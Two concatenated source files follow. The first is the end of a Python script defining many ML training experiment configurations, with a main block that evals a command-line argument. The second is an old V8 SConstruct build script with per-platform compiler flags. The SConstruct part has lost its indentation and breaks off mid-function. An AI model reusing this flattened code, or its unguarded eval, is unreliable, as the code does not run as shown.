ch032_1side_7__2side_7__3side_6_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_6_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s6__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_6_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_6_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_6_4side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s6__4s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_6_4side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_6_4side_5 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_6_4side_5_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s6__4s5") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_6_4side_5, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_6_4side_6 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_6_4side_6_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s6__4s6") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_6_4side_6, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_7_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_7_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s7__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_7_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_7_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_7_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s7__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_7_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_7_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_7_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s7__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_7_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_7_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_7_4side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s7__4s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_7_4side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_7_4side_5 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_7_4side_5_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s7__4s5") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_7_4side_5, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_7_4side_6 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_7_4side_6_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s7__4s6") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_7_4side_6, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_7_4side_7 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_7_4side_7_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s7__4s7") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_7_4side_7, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
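# Note on naming: each builder above encodes its pyramid configuration, e.g.
# ch032_1side_7__2side_7__3side_7_4side_7 means 32 channels with 1side=7, 2side=7,
# 3side=7 and 4side=7, mirrored by the shorthand describe_end string "ch032_1s7__2s7__3s7__4s7".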
#############################################################
if __name__ == "__main__":
    print("build exps cost time:", time.time() - start_time)
    if len(sys.argv) < 2:
        ############################################################################################################
        ### Run this file directly (press F5 or `python step10_b1_exp_obj_load_and_train_and_test.py` with no
        ### arguments) so execution stays in this branch and never reaches the code below, which is meant for
        ### step10_b_subprocess.py.
        ch032_1side_1__2side_1__3side_1_4side_1.build().run()
        # print('no argument')
        sys.exit()

    ### The code below is for step10_b_subprocess.py; it is equivalent to running
    ### `python step10_b1_exp_obj_load_and_train_and_test.py "some_exp.build().run()"` on the command line.
    eval(sys.argv[1])
# ===== /deps/v8/SConstruct =====
# Copyright 2008 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import platform
import re
import sys
import os
from os.path import join, dirname, abspath
from types import DictType, StringTypes
root_dir = dirname(File('SConstruct').rfile().abspath)
sys.path.append(join(root_dir, 'tools'))
import js2c, utils
# ANDROID_TOP is the top of the Android checkout, fetched from the environment
# variable 'TOP'. You will also need to set the CXX, CC, AR and RANLIB
# environment variables to the cross-compiling tools.
ANDROID_TOP = os.environ.get('TOP')
if ANDROID_TOP is None:
ANDROID_TOP=""
# TODO: Sort these issues out properly but as a temporary solution for gcc 4.4
# on linux we need these compiler flags to avoid crashes in the v8 test suite
# and avoid dtoa.c strict aliasing issues
if os.environ.get('GCC_VERSION') == '44':
GCC_EXTRA_CCFLAGS = ['-fno-tree-vrp']
GCC_DTOA_EXTRA_CCFLAGS = ['-fno-strict-aliasing']
else:
GCC_EXTRA_CCFLAGS = []
GCC_DTOA_EXTRA_CCFLAGS = []
ANDROID_FLAGS = ['-march=armv5te',
'-mtune=xscale',
'-msoft-float',
'-fpic',
'-mthumb-interwork',
'-funwind-tables',
'-fstack-protector',
'-fno-short-enums',
'-fmessage-length=0',
'-finline-functions',
'-fno-inline-functions-called-once',
'-fgcse-after-reload',
'-frerun-cse-after-loop',
'-frename-registers',
'-fomit-frame-pointer',
'-fno-strict-aliasing',
'-finline-limit=64',
'-MD']
ANDROID_INCLUDES = [ANDROID_TOP + '/bionic/libc/arch-arm/include',
ANDROID_TOP + '/bionic/libc/include',
ANDROID_TOP + '/bionic/libstdc++/include',
ANDROID_TOP + '/bionic/libc/kernel/common',
ANDROID_TOP + '/bionic/libc/kernel/arch-arm',
ANDROID_TOP + '/bionic/libm/include',
ANDROID_TOP + '/bionic/libm/include/arch/arm',
ANDROID_TOP + '/bionic/libthread_db/include',
ANDROID_TOP + '/frameworks/base/include',
ANDROID_TOP + '/system/core/include']
ANDROID_LINKFLAGS = ['-nostdlib',
'-Bdynamic',
'-Wl,-T,' + ANDROID_TOP + '/build/core/armelf.x',
'-Wl,-dynamic-linker,/system/bin/linker',
'-Wl,--gc-sections',
'-Wl,-z,nocopyreloc',
'-Wl,-rpath-link=' + ANDROID_TOP + '/out/target/product/generic/obj/lib',
ANDROID_TOP + '/out/target/product/generic/obj/lib/crtbegin_dynamic.o',
ANDROID_TOP + '/prebuilt/linux-x86/toolchain/arm-eabi-4.2.1/lib/gcc/arm-eabi/4.2.1/interwork/libgcc.a',
                     ANDROID_TOP + '/out/target/product/generic/obj/lib/crtend_android.o']
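# The flag dictionaries below are hierarchical: top-level keys name a toolchain
# ('gcc', 'msvc') or apply unconditionally ('all'); nested 'option:value' keys
# (e.g. 'mode:debug', 'os:linux') contribute their settings only when the
# corresponding build option is set to that value.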
LIBRARY_FLAGS = {
'all': {
'CPPDEFINES': [''],
'CPPPATH': [join(root_dir, 'src')],
'regexp:native': {
'CPPDEFINES': ['V8_NATIVE_REGEXP']
},
'mode:debug': {
'CPPDEFINES': ['V8_ENABLE_CHECKS']
}
},
'gcc': {
'all': {
'CCFLAGS': ['$DIALECTFLAGS', '$WARNINGFLAGS'],
'CXXFLAGS': ['$CCFLAGS', '-fno-rtti', '-fno-exceptions'],
},
'mode:debug': {
'CCFLAGS': ['-g', '-O0'],
'CPPDEFINES': ['ENABLE_DISASSEMBLER', 'DEBUG'],
'os:android': {
'CPPDEFINES': ['ENABLE_DEBUGGER_SUPPORT'],
'CCFLAGS': ['-mthumb']
}
},
'mode:release': {
'CCFLAGS': ['-O3', '-fomit-frame-pointer', '-fdata-sections',
'-ffunction-sections'],
'os:android': {
'CCFLAGS': ['-mthumb', '-Os'],
'CPPDEFINES': ['SK_RELEASE', 'NDEBUG', 'ENABLE_DEBUGGER_SUPPORT']
}
},
'os:linux': {
'CCFLAGS': ['-ansi'] + GCC_EXTRA_CCFLAGS,
'library:shared': {
'CPPDEFINES': ['V8_SHARED'],
'LIBS': ['pthread']
}
},
'os:macos': {
'CCFLAGS': ['-ansi', '-mmacosx-version-min=10.4'],
},
'os:freebsd': {
'CPPPATH' : ['/usr/local/include'],
'LIBPATH' : ['/usr/local/lib'],
'CCFLAGS': ['-ansi'],
},
'os:win32': {
'CCFLAGS': ['-DWIN32'],
'CXXFLAGS': ['-DWIN32'],
},
'os:android': {
'CPPDEFINES': ['ANDROID', '__ARM_ARCH_5__', '__ARM_ARCH_5T__',
'__ARM_ARCH_5E__', '__ARM_ARCH_5TE__'],
'CCFLAGS': ANDROID_FLAGS,
'WARNINGFLAGS': ['-Wall', '-Wno-unused', '-Werror=return-type',
'-Wstrict-aliasing=2'],
'CPPPATH': ANDROID_INCLUDES,
},
'arch:ia32': {
'CPPDEFINES': ['V8_TARGET_ARCH_IA32'],
'CCFLAGS': ['-m32'],
'LINKFLAGS': ['-m32']
},
'arch:arm': {
'CPPDEFINES': ['V8_TARGET_ARCH_ARM']
},
'simulator:arm': {
'CCFLAGS': ['-m32'],
'LINKFLAGS': ['-m32']
},
'arch:x64': {
'CPPDEFINES': ['V8_TARGET_ARCH_X64'],
'CCFLAGS': ['-m64'],
'LINKFLAGS': ['-m64'],
},
'prof:oprofile': {
'CPPDEFINES': ['ENABLE_OPROFILE_AGENT']
}
},
'msvc': {
'all': {
'CCFLAGS': ['$DIALECTFLAGS', '$WARNINGFLAGS'],
'CXXFLAGS': ['$CCFLAGS', '/GR-', '/Gy'],
'CPPDEFINES': ['WIN32'],
'LINKFLAGS': ['/INCREMENTAL:NO', '/NXCOMPAT', '/IGNORE:4221'],
'CCPDBFLAGS': ['/Zi']
},
'verbose:off': {
'DIALECTFLAGS': ['/nologo'],
'ARFLAGS': ['/NOLOGO']
},
'arch:ia32': {
'CPPDEFINES': ['V8_TARGET_ARCH_IA32', '_USE_32BIT_TIME_T'],
'LINKFLAGS': ['/MACHINE:X86'],
'ARFLAGS': ['/MACHINE:X86']
},
'arch:x64': {
'CPPDEFINES': ['V8_TARGET_ARCH_X64'],
'LINKFLAGS': ['/MACHINE:X64'],
'ARFLAGS': ['/MACHINE:X64']
},
'mode:debug': {
'CCFLAGS': ['/Od', '/Gm'],
'CPPDEFINES': ['_DEBUG', 'ENABLE_DISASSEMBLER', 'DEBUG'],
'LINKFLAGS': ['/DEBUG'],
'msvcrt:static': {
'CCFLAGS': ['/MTd']
},
'msvcrt:shared': {
'CCFLAGS': ['/MDd']
}
},
'mode:release': {
'CCFLAGS': ['/O2'],
'LINKFLAGS': ['/OPT:REF', '/OPT:ICF'],
'msvcrt:static': {
'CCFLAGS': ['/MT']
},
'msvcrt:shared': {
'CCFLAGS': ['/MD']
},
'msvcltcg:on': {
'CCFLAGS': ['/GL'],
'LINKFLAGS': ['/LTCG'],
'ARFLAGS': ['/LTCG'],
}
}
}
}
V8_EXTRA_FLAGS = {
'gcc': {
'all': {
'CXXFLAGS': [], #['-fvisibility=hidden'],
'WARNINGFLAGS': ['-Wall',
'-Werror',
'-W',
'-Wno-unused-parameter',
'-Wnon-virtual-dtor']
},
'os:win32': {
'WARNINGFLAGS': ['-pedantic', '-Wno-long-long']
},
'os:linux': {
'WARNINGFLAGS': ['-pedantic'],
'library:shared': {
'soname:on': {
'LINKFLAGS': ['-Wl,-soname,${SONAME}']
}
}
},
'os:macos': {
'WARNINGFLAGS': ['-pedantic']
},
'disassembler:on': {
'CPPDEFINES': ['ENABLE_DISASSEMBLER']
}
},
'msvc': {
'all': {
'WARNINGFLAGS': ['/WX', '/wd4355', '/wd4800']
},
'library:shared': {
'CPPDEFINES': ['BUILDING_V8_SHARED'],
'LIBS': ['winmm', 'ws2_32']
},
'arch:ia32': {
'WARNINGFLAGS': ['/W3']
},
'arch:x64': {
'WARNINGFLAGS': ['/W2']
},
'arch:arm': {
'CPPDEFINES': ['V8_TARGET_ARCH_ARM'],
# /wd4996 is to silence the warning about sscanf
# used by the arm simulator.
'WARNINGFLAGS': ['/wd4996']
},
'disassembler:on': {
'CPPDEFINES': ['ENABLE_DISASSEMBLER']
}
}
}
MKSNAPSHOT_EXTRA_FLAGS = {
'gcc': {
'os:linux': {
'LIBS': ['pthread'],
},
'os:macos': {
'LIBS': ['pthread'],
},
'os:freebsd': {
'LIBS': ['execinfo', 'pthread']
},
'os:win32': {
'LIBS': ['winmm', 'ws2_32'],
},
},
'msvc': {
'all': {
'CPPDEFINES': ['_HAS_EXCEPTIONS=0'],
'LIBS': ['winmm', 'ws2_32']
}
}
}
DTOA_EXTRA_FLAGS = {
'gcc': {
'all': {
'WARNINGFLAGS': ['-Werror', '-Wno-uninitialized'],
'CCFLAGS': GCC_DTOA_EXTRA_CCFLAGS
}
},
'msvc': {
'all': {
'WARNINGFLAGS': ['/WX', '/wd4018', '/wd4244']
}
}
}
CCTEST_EXTRA_FLAGS = {
'all': {
'CPPPATH': [join(root_dir, 'src')],
'LIBS': ['$LIBRARY']
},
'gcc': {
'all': {
'LIBPATH': [abspath('.')]
},
'os:linux': {
'LIBS': ['pthread'],
},
'os:macos': {
'LIBS': ['pthread'],
},
'os:freebsd': {
'LIBS': ['execinfo', 'pthread']
},
'os:win32': {
'LIBS': ['winmm', 'ws2_32']
},
'os:android': {
'CPPDEFINES': ['ANDROID', '__ARM_ARCH_5__', '__ARM_ARCH_5T__',
'__ARM_ARCH_5E__', '__ARM_ARCH_5TE__'],
'CCFLAGS': ANDROID_FLAGS,
'CPPPATH': ANDROID_INCLUDES,
'LIBPATH': [ANDROID_TOP + '/out/target/product/generic/obj/lib'],
'LINKFLAGS': ANDROID_LINKFLAGS,
'LIBS': ['log', 'c', 'stdc++', 'm'],
'mode:release': {
'CPPDEFINES': ['SK_RELEASE', 'NDEBUG']
}
},
},
'msvc': {
'all': {
'CPPDEFINES': ['_HAS_EXCEPTIONS=0'],
'LIBS': ['winmm', 'ws2_32']
},
'library:shared': {
'CPPDEFINES': ['USING_V8_SHARED']
},
'arch:ia32': {
'CPPDEFINES': ['V8_TARGET_ARCH_IA32']
},
'arch:x64': {
'CPPDEFINES': ['V8_TARGET_ARCH_X64']
},
}
}
SAMPLE_FLAGS = {
'all': {
'CPPPATH': [join(abspath('.'), 'include')],
'LIBS': ['$LIBRARY'],
},
'gcc': {
'all': {
'LIBPATH': ['.'],
'CCFLAGS': ['-fno-rtti', '-fno-exceptions']
},
'os:linux': {
'LIBS': ['pthread'],
},
'os:macos': {
'LIBS': ['pthread'],
},
'os:freebsd': {
'LIBPATH' : ['/usr/local/lib'],
'LIBS': ['execinfo', 'pthread']
},
'os:win32': {
'LIBS': ['winmm', 'ws2_32']
},
'os:android': {
'CPPDEFINES': ['ANDROID', '__ARM_ARCH_5__', '__ARM_ARCH_5T__',
'__ARM_ARCH_5E__', '__ARM_ARCH_5TE__'],
'CCFLAGS': ANDROID_FLAGS,
'CPPPATH': ANDROID_INCLUDES,
'LIBPATH': [ANDROID_TOP + '/out/target/product/generic/obj/lib'],
'LINKFLAGS': ANDROID_LINKFLAGS,
'LIBS': ['log', 'c', 'stdc++', 'm'],
'mode:release': {
'CPPDEFINES': ['SK_RELEASE', 'NDEBUG']
}
},
'arch:ia32': {
'CCFLAGS': ['-m32'],
'LINKFLAGS': ['-m32']
},
'arch:x64': {
'CCFLAGS': ['-m64'],
'LINKFLAGS': ['-m64']
},
'simulator:arm': {
'CCFLAGS': ['-m32'],
'LINKFLAGS': ['-m32']
},
'mode:release': {
'CCFLAGS': ['-O2']
},
'mode:debug': {
'CCFLAGS': ['-g', '-O0']
},
'prof:oprofile': {
'LIBPATH': ['/usr/lib32', '/usr/lib32/oprofile'],
'LIBS': ['opagent']
}
},
'msvc': {
'all': {
'LIBS': ['winmm', 'ws2_32']
},
'verbose:off': {
'CCFLAGS': ['/nologo'],
'LINKFLAGS': ['/NOLOGO']
},
'verbose:on': {
'LINKFLAGS': ['/VERBOSE']
},
'library:shared': {
'CPPDEFINES': ['USING_V8_SHARED']
},
'prof:on': {
'LINKFLAGS': ['/MAP']
},
'mode:release': {
'CCFLAGS': ['/O2'],
'LINKFLAGS': ['/OPT:REF', '/OPT:ICF'],
'msvcrt:static': {
'CCFLAGS': ['/MT']
},
'msvcrt:shared': {
'CCFLAGS': ['/MD']
},
'msvcltcg:on': {
'CCFLAGS': ['/GL'],
'LINKFLAGS': ['/LTCG'],
}
},
'arch:ia32': {
'CPPDEFINES': ['V8_TARGET_ARCH_IA32'],
'LINKFLAGS': ['/MACHINE:X86']
},
'arch:x64': {
'CPPDEFINES': ['V8_TARGET_ARCH_X64'],
'LINKFLAGS': ['/MACHINE:X64']
},
'mode:debug': {
'CCFLAGS': ['/Od'],
'LINKFLAGS': ['/DEBUG'],
'msvcrt:static': {
'CCFLAGS': ['/MTd']
},
'msvcrt:shared': {
'CCFLAGS': ['/MDd']
}
}
}
}
D8_FLAGS = {
'gcc': {
'console:readline': {
'LIBS': ['readline']
},
'os:linux': {
'LIBS': ['pthread'],
},
'os:macos': {
'LIBS': ['pthread'],
},
'os:freebsd': {
'LIBS': ['pthread'],
},
'os:android': {
'LIBPATH': [ANDROID_TOP + '/out/target/product/generic/obj/lib'],
'LINKFLAGS': ANDROID_LINKFLAGS,
'LIBS': ['log', 'c', 'stdc++', 'm'],
},
'os:win32': {
'LIBS': ['winmm', 'ws2_32'],
},
},
'msvc': {
'all': {
'LIBS': ['winmm', 'ws2_32']
}
}
}
SUFFIXES = {
'release': '',
'debug': '_g'
}
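# Build outputs are suffixed by mode, so a debug build of the library would
# presumably end in '_g' (e.g. libv8_g.a) while release builds carry no suffix.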
def Abort(message):
print message
sys.exit(1)
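# NOTE: `print message` above is Python 2 syntax; this SConstruct (like SCons of
# its era, cf. the dict.iteritems() calls below) is meant to run under Python 2.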
def GuessToolchain(os):
tools = Environment()['TOOLS']
if 'gcc' in tools:
return 'gcc'
elif 'msvc' in tools:
return 'msvc'
else:
return None
OS_GUESS = utils.GuessOS()
TOOLCHAIN_GUESS = GuessToolchain(OS_GUESS)
ARCH_GUESS = utils.GuessArchitecture()
SIMPLE_OPTIONS = {
'toolchain': {
'values': ['gcc', 'msvc'],
'default': TOOLCHAIN_GUESS,
'help': 'the toolchain to use (' + TOOLCHAIN_GUESS + ')'
},
'os': {
'values': ['freebsd', 'linux', 'macos', 'win32', 'android'],
'default': OS_GUESS,
'help': 'the os to build for (' + OS_GUESS + ')'
},
'arch': {
'values':['arm', 'ia32', 'x64'],
'default': ARCH_GUESS,
'help': 'the architecture to build for (' + ARCH_GUESS + ')'
},
'regexp': {
'values': ['native', 'interpreted'],
'default': 'native',
'help': 'Whether to use native or interpreted regexp implementation'
},
'snapshot': {
'values': ['on', 'off', 'nobuild'],
'default': 'off',
'help': 'build using snapshots for faster start-up'
},
'prof': {
'values': ['on', 'off', 'oprofile'],
'default': 'off',
'help': 'enable profiling of build target'
},
'library': {
'values': ['static', 'shared'],
'default': 'static',
'help': 'the type of library to produce'
},
'soname': {
'values': ['on', 'off'],
'default': 'off',
'help': 'turn on setting soname for Linux shared library'
},
'msvcrt': {
'values': ['static', 'shared'],
'default': 'static',
'help': 'the type of Microsoft Visual C++ runtime library to use'
},
'msvcltcg': {
'values': ['on', 'off'],
'default': 'on',
'help': 'use Microsoft Visual C++ link-time code generation'
},
'simulator': {
'values': ['arm', 'none'],
'default': 'none',
'help': 'build with simulator'
},
'disassembler': {
'values': ['on', 'off'],
'default': 'off',
'help': 'enable the disassembler to inspect generated code'
},
'sourcesignatures': {
'values': ['MD5', 'timestamp'],
'default': 'MD5',
'help': 'set how the build system detects file changes'
},
'console': {
'values': ['dumb', 'readline'],
'default': 'dumb',
'help': 'the console to use for the d8 shell'
},
'verbose': {
'values': ['on', 'off'],
'default': 'off',
'help': 'more output from compiler and linker'
}
}
def GetOptions():
result = Options()
result.Add('mode', 'compilation mode (debug, release)', 'release')
result.Add('sample', 'build sample (shell, process)', '')
result.Add('env', 'override environment settings (NAME0:value0,NAME1:value1,...)', '')
result.Add('importenv', 'import environment settings (NAME0,NAME1,...)', '')
for (name, option) in SIMPLE_OPTIONS.iteritems():
help = '%s (%s)' % (name, ", ".join(option['values']))
result.Add(name, help, option.get('default'))
return result
def GetVersionComponents():
MAJOR_VERSION_PATTERN = re.compile(r"#define\s+MAJOR_VERSION\s+(.*)")
MINOR_VERSION_PATTERN = re.compile(r"#define\s+MINOR_VERSION\s+(.*)")
BUILD_NUMBER_PATTERN = re.compile(r"#define\s+BUILD_NUMBER\s+(.*)")
PATCH_LEVEL_PATTERN = re.compile(r"#define\s+PATCH_LEVEL\s+(.*)")
patterns = [MAJOR_VERSION_PATTERN,
MINOR_VERSION_PATTERN,
BUILD_NUMBER_PATTERN,
PATCH_LEVEL_PATTERN]
source = open(join(root_dir, 'src', 'version.cc')).read()
version_components = []
for pattern in patterns:
match = pattern.search(source)
if match:
version_components.append(match.group(1).strip())
else:
version_components.append('0')
return version_components
def GetVersion():
version_components = GetVersionComponents()
if version_components[len(version_components) - 1] == '0':
version_components.pop()
return '.'.join(version_components)
def GetSpecificSONAME():
SONAME_PATTERN = re.compile(r"#define\s+SONAME\s+\"(.*)\"")
source = open(join(root_dir, 'src', 'version.cc')).read()
match = SONAME_PATTERN.search(source)
if match:
return match.group(1).strip()
else:
return ''
def SplitList(str):
return [ s for s in str.split(",") if len(s) > 0 ]
def IsLegal(env, option, values):
str = env[option]
for s in SplitList(str):
if not s in values:
Abort("Illegal value for option %s '%s'." % (option, s))
return False
return True
def VerifyOptions(env):
if not IsLegal(env, 'mode', ['debug', 'release']):
return False
if not IsLegal(env, 'sample', ["shell", "process"]):
return False
if not IsLegal(env, 'regexp', ["native", "interpreted"]):
return False
if env['os'] == 'win32' and env['library'] == 'shared' and env['prof'] == 'on':
Abort("Profiling on windows only supported for static library.")
if env['prof'] == 'oprofile' and env['os'] != 'linux':
Abort("OProfile is only supported on Linux.")
if env['os'] == 'win32' and env['soname'] == 'on':
Abort("Shared Object soname not applicable for Windows.")
if env['soname'] == 'on' and env['library'] == 'static':
Abort("Shared Object soname not applicable for static library.")
for (name, option) in SIMPLE_OPTIONS.iteritems():
if (not option.get('default')) and (name not in ARGUMENTS):
message = ("A value for option %s must be specified (%s)." %
(name, ", ".join(option['values'])))
Abort(message)
if not env[name] in option['values']:
message = ("Unknown %s value '%s'. Possible values are (%s)." %
(name, env[name], ", ".join(option['values'])))
Abort(message)
class BuildContext(object):
def __init__(self, options, env_overrides, samples):
self.library_targets = []
self.mksnapshot_targets = []
self.cctest_targets = []
self.sample_targets = []
self.d8_targets = []
self.options = options
self.env_overrides = env_overrides
self.samples = samples
self.use_snapshot = (options['snapshot'] != 'off')
self.build_snapshot = (options['snapshot'] == 'on')
self.flags = None
def AddRelevantFlags(self, initial, flags):
result = initial.copy()
toolchain = self.options['toolchain']
if toolchain in flags:
self.AppendFlags(result, flags[toolchain].get('all'))
for option in sorted(self.options.keys()):
value = self.options[option]
self.AppendFlags(result, flags[toolchain].get(option + ':' + value))
self.AppendFlags(result, flags.get('all'))
return result
def AddRelevantSubFlags(self, options, flags):
self.AppendFlags(options, flags.get('all'))
for option in sorted(self.options.keys()):
value = self.options[option]
self.AppendFlags(options, flags.get(option + ':' + value))
def GetRelevantSources(self, source):
result = []
result += source.get('all', [])
for (name, value) in self.options.iteritems():
